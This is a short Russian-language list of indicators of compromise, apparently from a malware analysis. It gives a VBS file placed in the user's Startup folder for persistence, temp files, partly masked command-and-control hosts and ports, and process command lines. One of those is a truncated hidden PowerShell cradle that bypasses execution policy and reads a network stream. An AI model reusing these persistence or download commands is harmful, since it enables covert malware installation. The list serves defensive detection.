Техническая информация
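- %HOMEPATH%\Start Menu\Programs\Startup\1.vbs (папка автозагрузки пользователя: размещённый здесь скрипт выполняется при каждом входе в систему, то есть служит механизмом закрепления)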
- %TEMP%\aut1.tmp
- %TEMP%\1.vbs
- %TEMP%\aut2.tmp
- %TEMP%\bein.m3u
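- %TEMP%\aut1.tmp
- %TEMP%\aut2.tmp (оба пути повторяются; заголовки подразделов в этом фрагменте не сохранились, поэтому по тексту нельзя определить, к какой операции с файлами относится повтор)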
- 'localhost':1037
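- '46.##1.250.197':8900
- 'sw##.fannan.se':8000
- DNS ASK sw##.fannan.se (символы ## в IP-адресе и имени узла — по-видимому, маскировка в исходном тексте, а не часть значения; в таком виде индикаторы неполные и годятся для сопоставления по шаблону, но не для точной блокировки)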
- ClassName: 'ReBarWindow32' WindowName: ''
- ClassName: 'WMP9DeskBand' WindowName: 'WMP9DeskBand'
- '<SYSTEM32>\wscript.exe' "%TEMP%\1.vbs"
- '%ProgramFiles%\Windows Media Player\wmplayer.exe' /prefetch:6 /Open "%TEMP%\bein.m3u"
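- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.... (командная строка в источнике обрезана; видимая часть показывает запуск PowerShell через cmd.exe со скрытым окном, с обходом политики выполнения и чтением сетевого потока через System.Net.WebClient — такое сочетание параметров стоит отслеживать в журналах создания процессов)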